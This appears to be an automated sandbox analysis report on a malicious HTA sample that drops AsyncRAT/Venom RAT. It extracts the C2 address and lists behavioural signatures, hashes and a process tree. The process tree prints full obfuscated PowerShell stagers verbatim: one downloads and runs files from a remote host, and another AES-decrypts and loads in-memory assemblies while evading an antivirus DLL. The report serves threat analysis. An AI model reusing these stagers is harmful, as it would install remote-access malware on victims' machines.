Analysis
-
max time kernel
99s -
max time network
105s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
09/05/2024, 02:00
Static task
static1
Behavioral task
behavioral1
Sample
c39754c0eb845d1fa60618c95519d430fef1d5e537baf83f63a67c8b0ef9c709.hta
Resource
win7-20240221-en
General
-
Target
c39754c0eb845d1fa60618c95519d430fef1d5e537baf83f63a67c8b0ef9c709.hta
-
Size
13KB
-
MD5
18dbd534f0a9f76cfb874a7a7e688c90
-
SHA1
1bdad469ec9dcc975e1a95abdcaa2d7881b3ad81
-
SHA256
c39754c0eb845d1fa60618c95519d430fef1d5e537baf83f63a67c8b0ef9c709
-
SHA512
71dfd6053725344b3e41b9722986da8562c7e3bcb53386eb5fc2ff769b025a71d0701ba60a759f4b660987d2b7ca4a2cbe037085e05202582a51c6fd25af9e57
-
SSDEEP
384:17RaKJD8W7aauapKCE+1GW3lglBTlp3WzlmjlVgbC5972:17RaKJD8W7aauapKCE+1GWV4Bxp3WRmg
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
193.222.96.143:4449
bkfcocpkfci
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/3260-89-0x0000000007E30000-0x0000000007E48000-memory.dmp family_asyncrat -
Detects executables attemping to enumerate video devices using WMI 1 IoCs
resource yara_rule behavioral2/memory/3260-89-0x0000000007E30000-0x0000000007E48000-memory.dmp INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice -
Blocklisted process makes network request 6 IoCs
flow pid Process 18 3344 powershell.exe 20 3344 powershell.exe 40 3260 powershell.exe 42 3260 powershell.exe 55 3260 powershell.exe 80 3260 powershell.exe -
pid Process 3344 powershell.exe 2484 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3056 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3344 powershell.exe 3344 powershell.exe 3260 powershell.exe 3260 powershell.exe 2484 powershell.exe 2484 powershell.exe 3260 powershell.exe 3260 powershell.exe 3260 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3344 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe Token: SeDebugPrivilege 2484 powershell.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 3056 EXCEL.EXE 3056 EXCEL.EXE 3056 EXCEL.EXE 3056 EXCEL.EXE 3056 EXCEL.EXE 3056 EXCEL.EXE 3056 EXCEL.EXE 3056 EXCEL.EXE 3056 EXCEL.EXE 3056 EXCEL.EXE 3056 EXCEL.EXE 3056 EXCEL.EXE 3260 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 548 wrote to memory of 3344 548 mshta.exe 82 PID 548 wrote to memory of 3344 548 mshta.exe 82 PID 548 wrote to memory of 3344 548 mshta.exe 82 PID 3344 wrote to memory of 3056 3344 powershell.exe 87 PID 3344 wrote to memory of 3056 3344 powershell.exe 87 PID 3344 wrote to memory of 3056 3344 powershell.exe 87 PID 3344 wrote to memory of 212 3344 powershell.exe 89 PID 3344 wrote to memory of 212 3344 powershell.exe 89 PID 3344 wrote to memory of 212 3344 powershell.exe 89 PID 212 wrote to memory of 4712 212 cmd.exe 91 PID 212 wrote to memory of 4712 212 cmd.exe 91 PID 212 wrote to memory of 4712 212 cmd.exe 91 PID 4712 wrote to memory of 1800 4712 cmd.exe 93 PID 4712 wrote to memory of 1800 4712 cmd.exe 93 PID 4712 wrote to memory of 1800 4712 cmd.exe 93 PID 4712 wrote to memory of 3260 4712 cmd.exe 94 PID 4712 wrote to memory of 3260 4712 cmd.exe 94 PID 4712 wrote to memory of 3260 4712 cmd.exe 94 PID 3260 wrote to memory of 2484 3260 powershell.exe 100 PID 3260 wrote to memory of 2484 3260 powershell.exe 100 PID 3260 wrote to memory of 2484 3260 powershell.exe 100
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c39754c0eb845d1fa60618c95519d430fef1d5e537baf83f63a67c8b0ef9c709.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function oYYtmcfgNVALjZ($AMoNCQYGRgLRoU, $yowkcxYklFDKtli){[IO.File]::WriteAllBytes($AMoNCQYGRgLRoU, $yowkcxYklFDKtli)};function oocZbSbPqugD($AMoNCQYGRgLRoU){if($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59872,59880,59880))) -eq $True){rundll32.exe $AMoNCQYGRgLRoU }elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59884,59887,59821))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $AMoNCQYGRgLRoU}elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59881,59887,59877))) -eq $True){misexec /qn /i $AMoNCQYGRgLRoU}else{Start-Process $AMoNCQYGRgLRoU}};function jlAPajKrXnXds($irMBWZFpvuqduX){$hWiCJPXtnbCAfgDIPKdzz = New-Object (iGrhVnKiZYQ @(59850,59873,59888,59818,59859,59873,59870,59839,59880,59877,59873,59882,59888));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yowkcxYklFDKtli = $hWiCJPXtnbCAfgDIPKdzz.DownloadData($irMBWZFpvuqduX);return $yowkcxYklFDKtli};function iGrhVnKiZYQ($eaILzSbnqJ){$lgMdU=59772;$pkNOUpDlz=$Null;foreach($WtZmnegAvYDwZrJ in $eaILzSbnqJ){$pkNOUpDlz+=[char]($WtZmnegAvYDwZrJ-$lgMdU)};return $pkNOUpDlz};function wwFwRQUTDiTf(){$wPeJapJpGtoAMd = $env:AppData + '\';$ZxSzqAOPdWfCSvt = $wPeJapJpGtoAMd + 'Excel.xlsx';If(Test-Path -Path $ZxSzqAOPdWfCSvt){Invoke-Item $ZxSzqAOPdWfCSvt;}Else{ $VbnfWkgMtzU = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59841,59892,59871,59873,59880,59818,59892,59880,59887,59892));oYYtmcfgNVALjZ $ZxSzqAOPdWfCSvt $VbnfWkgMtzU;Invoke-Item $ZxSzqAOPdWfCSvt;};$qQjgFPGszJBcNb = $wPeJapJpGtoAMd + 'xx.bat'; if (Test-Path -Path $qQjgFPGszJBcNb){oocZbSbPqugD $qQjgFPGszJBcNb;}Else{ $aiJbTZVrclHZrx = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59892,59892,59818,59870,59869,59888));oYYtmcfgNVALjZ $qQjgFPGszJBcNb $aiJbTZVrclHZrx;oocZbSbPqugD $qQjgFPGszJBcNb;};;;;}wwFwRQUTDiTf;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\Excel.xlsx"3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\xx.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\xx.bat"4⤵
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\xx.bat';$BMbC='RsHpUesHpUadLsHpUinsHpUesHpUssHpU'.Replace('sHpU', ''),'CCFZsreCFZsatCFZseDCFZsecCFZsrCFZsyCFZspCFZstCFZsorCFZs'.Replace('CFZs', ''),'FrBDpromBDprBBDpraBDprseBDpr6BDpr4SBDprtrBDpriBDprngBDpr'.Replace('BDpr', ''),'ChAmxTanAmxTgAmxTeEAmxTxtAmxTensAmxTiAmxTonAmxT'.Replace('AmxT', ''),'DMtvCecMtvComMtvCprMtvCeMtvCsMtvCsMtvC'.Replace('MtvC', ''),'LCapfoaCapfdCapf'.Replace('Capf', ''),'ISAmunSAmuvokSAmueSAmu'.Replace('SAmu', ''),'MawqArinMwqArowqArduwqArlewqAr'.Replace('wqAr', ''),'GetKwgmCuKwgmrreKwgmntKwgmPKwgmrocKwgmessKwgm'.Replace('Kwgm', ''),'SplMBlVitMBlV'.Replace('MBlV', ''),'ElayXCemayXCeayXCnayXCtayXCAtayXC'.Replace('ayXC', ''),'TVQktranVQktsVQktforVQktmFiVQktnaVQktlVQktBVQktloVQktcVQktkVQkt'.Replace('VQkt', ''),'EnXNnYtXNnYrXNnYyPoXNnYintXNnY'.Replace('XNnY', ''),'ComQwwpyTmQwwomQww'.Replace('mQww', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BMbC[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function zlGLC($RSWKX){$GVeOl=[System.Security.Cryptography.Aes]::Create();$GVeOl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$GVeOl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$GVeOl.Key=[System.Convert]::($BMbC[2])('uY6F5j209xASZjaoUU93vCCXVRY+Y6fGH5LCH0uNzYo=');$GVeOl.IV=[System.Convert]::($BMbC[2])('iwvv8vpAhw35q7w8nU7OXw==');$QznTD=$GVeOl.($BMbC[1])();$RHHCU=$QznTD.($BMbC[11])($RSWKX,0,$RSWKX.Length);$QznTD.Dispose();$GVeOl.Dispose();$RHHCU;}function lfrrO($RSWKX){$kKatK=New-Object System.IO.MemoryStream(,$RSWKX);$EyOwi=New-Object System.IO.MemoryStream;$oJtRR=New-Object System.IO.Compression.GZipStream($kKatK,[IO.Compression.CompressionMode]::($BMbC[4]));$oJtRR.($BMbC[13])($EyOwi);$oJtRR.Dispose();$kKatK.Dispose();$EyOwi.Dispose();$EyOwi.ToArray();}$FYWBz=[System.IO.File]::($BMbC[0])([Console]::Title);$QpMEc=lfrrO (zlGLC ([Convert]::($BMbC[2])([System.Linq.Enumerable]::($BMbC[10])($FYWBz, 5).Substring(2))));$IyoFy=lfrrO (zlGLC ([Convert]::($BMbC[2])([System.Linq.Enumerable]::($BMbC[10])($FYWBz, 6).Substring(2))));[System.Reflection.Assembly]::($BMbC[5])([byte[]]$IyoFy).($BMbC[12]).($BMbC[6])($null,$null);[System.Reflection.Assembly]::($BMbC[5])([byte[]]$QpMEc).($BMbC[12]).($BMbC[6])($null,$null); "5⤵PID:1800
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD50774a05ce5ee4c1af7097353c9296c62
SHA1658ff96b111c21c39d7ad5f510fb72f9762114bb
SHA256d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4
SHA512104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
8KB
MD50ce5e7b8bf48809d64e16b0f50e06d03
SHA118a92eedf1c3e6654043fe4979aadcfd3247af97
SHA25652ebeaad2dc40e47640b5a766492739aa5992fde759e36c94b70d90ab4713451
SHA512e3b45e38e38a36ca195bf8914e868fab9583942e5c728e2e9d4dbf1367fd1b373c3a918ed588f84115f253d15074a64544d89d6edf7b6e0523e009529af58ad8
-
Filesize
219B
MD56e31c28694f160a4dcd8dbf64af2197b
SHA1429cc22e66217f3208e8a19d2b9679b64ffbdc77
SHA256238b09243522a20a31419d11972793c74afcdac348e2aba245d6db79822eb67b
SHA512f058f641ab2a01abe5f285a1aa71e3b9d4752742a8e8eb6be20a2fb5a47da3ed5c947df41feeceb0f570d77d928f64dae4495d8f28aaf6077a368295eda8f96e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize855B
MD59f18beb6c81ba808c90d2569294fdfcb
SHA1fe5644c97d49173d39172b2cac01451e795ae3e1
SHA2563e0e800039560c4d5085e410b0c4ae43a04526b2252e9b98ef65bb76f4c892b2
SHA512a311106a7a915245f0a89c14fccbb64c87ff36a868c4ce9647ca0961af8155048aa86fcdc3c518f5312de14500e2d3c29c3b9c7a57573313189ad68570e41f03
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize24B
MD54fcb2a3ee025e4a10d21e1b154873fe2
SHA157658e2fa594b7d0b99d02e041d0f3418e58856b
SHA25690bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228
SHA5124e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff
-
Filesize
65KB
MD5963ce568ecee6a43389e1e12b60f325a
SHA12cbf2183bf67d7d2eeb98366ab9702e23e4d7c30
SHA2561331ae5fedc50718ee7ae4f73735ac7ca34e3756f3c75c843c8676a9f3db33ad
SHA51218c2c8dd7a1336cbd18c1d0e6659f47a8718492f37c1224c3348391b97b3c15e74108e293f2777323cec7bde6a645243a409d2d000b9b94bc7b71d4ee7ae8554